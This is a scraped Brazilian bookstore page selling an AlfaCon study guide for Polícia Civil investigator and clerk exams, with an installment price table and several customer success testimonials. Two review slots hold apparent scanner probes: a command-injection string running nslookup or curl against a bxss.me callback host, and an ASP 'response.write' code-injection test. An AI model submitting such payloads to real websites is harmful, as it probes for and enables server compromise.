| 1x de R$ 136.32 sem juros total R$ 136.32 |
| 1x de R$ 143.49 sem juros total R$ 143.49 |
| 2x de R$ 71.74 sem juros total R$ 143.49 |
| 3x de R$ 47.83 sem juros total R$ 143.49 |
| 4x de R$ 35.87 sem juros total R$ 143.49 |
| 5x de R$ 28.70 sem juros total R$ 143.49 |
| 6x de R$ 23.92 sem juros total R$ 143.49 |
| 7x de R$ 23.02 com juros total R$ 161.15 |
| 8x de R$ 20.43 com juros total R$ 163.46 |
| 9x de R$ 18.42 com juros total R$ 165.79 |
| 10x de R$ 16.81 com juros total R$ 168.13 |
| 11x de R$ 15.50 com juros total R$ 170.49 |
| 12x de R$ 14.41 com juros total R$ 172.88 |
A Editora AlfaCon oferece um guia completo para a preparação eficaz no concurso de Investigador e Escrivão de Polícia Civil. Esteja pronto para alcançar o sucesso na carreira pública!
Equipe de professores Alfacon
| Título | Ano | Páginas | Formato | ISBN |
|---|---|---|---|---|
| Apostila - Carreiras - Polícia Civil - Investigador e Escrivão | 01/2024 | 636 | 20.5 x 27.5 (cm) | 9786559186679 |
Olá Equipe Alfa, Estou muito feliz por minha aprovação. Dar vontade de sair gritando de tanta alegria. Vou...
Olá Equipe Alfa,
Estou muito feliz por minha aprovação. Dar vontade de sair gritando de tanta alegria. Vou contar um pouco sobre minha vida no início dos estudos:
Eu terminei o ensino médio praticamente analfabeto(é sério, só lemrava do professor falando de um tal de fonema). Em 2008, comecei a trabalhar numa escola estadual. Com o apoio do diretor Ari comecei a interessar por estudos. Coloquei na cabeça que iria fazer medicina em uma universidade federal, pois ganharia muito dinheiro. Eu estudava todos os dias e todos dizia que eu era doido e estava perdendo meu tempo. Todo esse tempo sem nenhum tostão. Não tenhia dinheiro pra nada, mas a vontade de estudar era grande. O primeiro concurso que passei foi no próprio municipio onde moro. Foi tudo estratégico: Passei para vigia...ganha pouco, porém tinha todo o tempo para estudar. Quando abriu o concurso do INSS resolvi fazê-lo, e foi aí que aconteceu uma coisa muito importante na minha vida: conheci a Equipe Alfa Concursos.
Essa Equipe ensinou-me como estudar realmente...comprei os cursos online e acessava (ainda acesso) o site e o blog do Alfa todos os dias. Fiquei reprovado no INSS por uma questão. Depois percebir que poderia ganhar dinheiro muito mais rápido com concurso público. Gostei tanto do Alfa que larguei de querer fazer vestibular (terei um diploma para fazer concurso de nível superior) para fazer concursos públicos. Fui aprovado no concurso da CEF e pretendo passar no concurso da DEPEN. Agradeço muito a Equipe Alfa, em especial o professor Evandro Guedes, pois eu também sempre digo que é a quantidade de esforço que desprendemos hoje é proporcional ao nosso sucesso de amanhã. Digo com muito orgulho que sou um alfartano. Para você que está começando estudar, pode confiar na Equipe Alfa, pois essa galera entende muito bem o que faz. Mais uma vez, obrigado Família Alfa.
&(nslookup -q=cname hitpxnkxretxka3745.bxss.me||curl hitpxnkxretxka3745.bxss.me)&'\"`0&(nslooku...
Sou esforçada e dedicada
Meu nome é Diego Leite de Oliveira, tenho 19 anos, sou de São Paulo – SP e fui aprovado no concurso do TJ S...
Meu nome é Diego Leite de Oliveira, tenho 19 anos, sou de São Paulo – SP e fui aprovado no concurso do TJ SP para o cargo de Escrevente Técnico Judiciário.
Atualmente estou cursando Direito e resolvi começar a estudar para concurso público por influência do meu pai que é servidor público estadual. Comecei a estudar em agosto de 2015. Estudava no período da manhã, à tarde trabalhava e à noite ia para a faculdade, mas tanto no caminho para o serviço, no próprio serviço e na faculdade qualquer tempo que tinha assistia as aulas pelo aplicativo ou fazia exercícios. Como trabalhava no período da tarde, estudava para os concursos de manhã. Qualquer momento que eu tinha livre eu usava para estudar, no ônibus, no metrô, antes da aula da faculdade começar. Estudava pelo curso do AlfaCon – TJ SP, curso supercompleto e foi muito importante na minha preparação e aprovação.
Durante esses dois anos de estudos foram diversos momentos que desanimei e cheguei até a parar de estudar por 1 mês, mas através dos vídeos motivacionais do AlfaCon, em especial do Evandro, Thállius e Chê, me mantinha motivado.
Comecei a estudar especialmente para o TJ SP em janeiro de 2017, ainda sem edital, e nessa época comecei a preparar a minha vida para quando edital saísse eu ficasse com o foco total no edital. Quando o edital saiu em março até a prova no dia 02/07, eu saí apenas dois finais de semana: encontro da turma do colégio e uma festa universitária (precisava para aliviar toda a tensão).
Mas antes do edital eu sempre saía no final de semana, desde que tivesse cumprido a meta de estudo da semana. Foram os inúmeros convites para sair durante a preparação, era difícil recusar, mas sempre pensava que aquela recusa estaria me aproximando da aprovação e que depois poderia aproveitar e melhor ainda.
Sou solteiro e moro com meus pais. Minha família sempre deu apoio total, e em especial meu pai, que já é servidor, sempre dizia palavras de motivação, nunca cobrou resultados e sempre se colocou à disposição no que pudesse ajudar. Para o edital do TJ SP, analisei bem, olhei o que já tinha estudado, o que o edital cobrava de novo e a partir disso me organizei, fiz um novo plano de estudos e renovei minha motivação. Enquanto não tinha o edital aberto sempre pensava que o estudo pré-edital seria o diferencial na aprovação.
Conheci o AlfaCon quando terminei um curso técnico de informática e decidi que iria prestar concursos. Entrei no YouTube e pesquisei "como estudar para concursos" e me deparei com a aula/lição de moral e desde aquele dia nunca mais parei de acompanhar o AlfaCon. O AlfaCon me ajudou muito, além das excelentes aulas e materiais, me mantiveram motivado.
Aprendi que cada um tem uma forma de aprender e que, no meu caso, aprendia muito mais com vídeo-aula do que com apostila. Dependendo da matéria eu assistia a vídeo-aula sem anotar nada, apenas prestando atenção e depois assistia mais uma vez anotando o que era dito. E no mesmo dia eu fazia exercícios sobre o tema que estudei.
Na preparação sempre vamos ter uma matéria que será uma pedra no sapato, no meu caso era Português. E além das matérias, tinha a questão de estar motivado, acreditar que ia dar certo. No caso do Português, estudava mais de um dia a matéria e fazia muitos exercícios da banca. Quando o edital saiu bateu um nervosismo, mas no dia seguinte me organizei, vi o que já tinha estudado, o que veio de novo em relação ao edital anterior. Organizar-me foi fundamental para evitar/diminuir o nervosismo e ansiedade até a prova.
A combinação de aulas + exercícios sobre o tema foi muito importante. E fazer exercícios foi MUITO importante e, com certeza, foi o que me fez passar. Já tinha feito tantos exercícios da VUNESP que parecia que na hora da prova eu já tinha feito todas as questões e que estava com a minha folha de exercícios.
Inicialmente, escolha uma carreira, demorei 1 ano para decidir pela carreira de tribuna. Depois se organize bem, faça plano de estudos, análise o edital. E lógico, estude e se dedique muito. Quando o desanimo bater assista um vídeo motivacional de quem já estudou, procure coisas que você gosta e quando ser aprovado vai poder comprar.
Estou desempregada eu recebo
Meu nome é Romaro, sou da Bahia, Iraporanga, tenho 30 anos, sou formado em Gestão Financeira. Decidi estuda...
Meu nome é Romaro, sou da Bahia, Iraporanga, tenho 30 anos, sou formado em Gestão Financeira. Decidi estudar para concursos por causa dos salários, estabilidade e porque só depende de nós mesmos. Estudei para o INSS desde o segundo semestre de 2014 e agradeci quando não saiu o edital no final de 2014, não estava preparado. Estudava todos os dias, via vídeo aula, fazia anotações e lia o material e respondia muitos exercícios. Estudava mais Previdenciário e Português. Estudava e trabalhava. Com o edital aberto, estudava das seis às oito horas e depois ia trabalhar, saía do trabalho as 18:00h e ia para o Alfa, lá era das 19 às 22 horas. Aos sábados estudava das nove e trinta até às 18:30, eu acho. Domingo simulados no Alfa ou em casa mesmo. Estudei com materiais do AlfaCon mesmo. Apostilas, presencial e eventos free. Sempre estive motivado, na reta final estava cansado, mas não dava mais para parar nem descansar. Lembrava do Thállius falando que valeria o esforço e seguia em frente. Abri mão de muita coisa, estudava aos fins de semana, feriados, passei minhas férias em casa estudando, carnaval, festas de fim de ano. É preciso muita disciplina para não relaxar, mas quando cansava dava uma parada, às vezes ficava um dia inteiro sem estudar. Sou casado, minha mulher me apoiou muito e foi muito importante nessa jornada, devo muito a ela, minha querida Cássia Lima. Fiz outras provas durante esse tempo. Fiz o TCE-SP, parei o curso do INSS para fazer o do TCE-SP lá no próprio Alfa SP, mas não fiquei nas vagas (fiquei em 198º de 105 vagas) aí decidi não mudar mais o foco e ficar só estudando para o INSS. Mas fiz outras provas: (MP-SP OFICIAL aprovado mas fora das vagas); (DPU - Agente Administrativo, fiquei em 16º de 23 vagas, fiz só pra ver como era a prova da CESPE, primeira vez aprovado dentro das vagas); (AMLURB - Analista Fiscal, fiquei em 6º de 54 vagas); Mas até agora ninguém chamou rsrs. Comecei a estudar em 2014 quando já tinha o boato de abrir o concurso, coisa que não aconteceu (ainda bem). Para continuar motivado eu pensava que se parasse agora poderia ter que voltar no futuro e ter que começar tudo de novo. Como se diz: - O concurso é uma fila... Conheci o Alfa pela internet, o online, depois uma amiga que estudava lá indicou e fui conhecer e fiquei. Com o material de qualidade e as aulas, tem muitos professores bons, as turmas de exercícios e os simulados também contribuíram muito. Não tenho técnica específica. Gosto de ler, depois ver vídeo aula, fazer anotações, exercícios, e muita repetição. Minha maior dificuldade no começo, foi disciplina, pra estudar em casa. Pensava no resultado e no que poderia mudar a minha vida, e pensar que só dependia de mim era e ainda é umas das coisas que me fazia continuar firme. Quando o edital sai é uma mistura de emoções, ao mesmo tempo você acha que falta pouco e muito tempo, quer que chegue logo a prova, quer que demore, é uma bagunça. Mas mantive o foco e estudei ainda mais, havia dias que respondia 700 e tantas questões, ficava ansioso e matava a ansiedade estudando, todo minuto era um momento para estudar. Acredito que fui efetivo pelo resultado, mas acredito que sempre é possível melhorar. Se tivesse saído o edital no final de 2014 ou início de 2015 não teria me saído bem. Não desistam, lembrem-se que se você sair hoje pode ter que voltar amanhã e voltará para o final da fila, lembrem-se que todo o esforço valerá, e que é melhor passar o resto dos dias aproveitando os resultados do que lamentando ter desistido, não será fácil a aprovação, fácil, só desistir.
Eu Eliene, Vi o anúcio do curso e fiz online !!!
response.write(9159273*9616891)
Apostila - Carreiras - Polícia Civil - Investigador e Esc...
de: R$ 143,49
por: R$ 136,32